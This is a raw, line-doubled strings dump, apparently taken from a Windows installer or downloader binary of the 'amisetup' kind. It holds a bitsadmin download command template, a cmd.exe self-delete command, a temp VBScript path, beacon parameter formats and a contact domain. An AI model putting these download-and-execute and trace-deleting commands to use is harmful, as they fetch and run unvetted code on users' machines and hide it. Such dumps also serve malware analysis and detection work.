keyWd
keyWd
W.launchCommandLineWWW
W.launchCommandLineWWW
~cmdW
~cmdW
WDIsShortNameInstalledd
WDIsShortNameInstalledd
Created by MIDL version 7.00.0555 at Mon Jul 18 19:01:37 2016
Created by MIDL version 7.00.0555 at Mon Jul 18 19:01:37 2016
0(171]1|1
0(171]1|1
="=(=.=`=
="=(=.=`=
6 6$6(6~6
6 6$6(6~6
: :$:<:>
: :$:<:>
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
wKERNEL32.DLL
wKERNEL32.DLL
ADVAPI32.DLL
ADVAPI32.DLL
WUSER32.DLL
WUSER32.DLL
Winhttp.dll
Winhttp.dll
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
appimageurl
appimageurl
cmdl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\bitsadmin.exe
\Support Tools\bitsadmin.exe
\Support Tools\bitsadmin.exe
:?*\"'/.
:?*\"'/.
%sami%s%d%d.exe
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
/retrynav %d
Advapi32.dll
Advapi32.dll
shell32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
OLEAUT32.DLL
kernel32.dll
kernel32.dll
sn=%s&hx=%S&base=%s
sn=%s&hx=%S&base=%s
rfsw%d
rfsw%d
advapi32.dll
advapi32.dll
v2.0.50727
v2.0.50727
v1.1.4322
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
%ProgramFiles%\Mozilla Firefox\firefox.exe
%ProgramFiles%\Mozilla Firefox\firefox.exe
ami%sExd
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
ami%sExi
/c del "%s"
/c del "%s"
cmd.exe
cmd.exe
%TEMP%\task.vbs
%TEMP%\task.vbs
ami%sExdel
ami%sExdel
%%X
%%X
version.dll
version.dll
OleAut32.dll
OleAut32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7849__99999_il2.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7849__99999_il2.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
1.1.5.26
setup.exe
setup.exe
smaltinecdcf.site
smaltinecdcf.site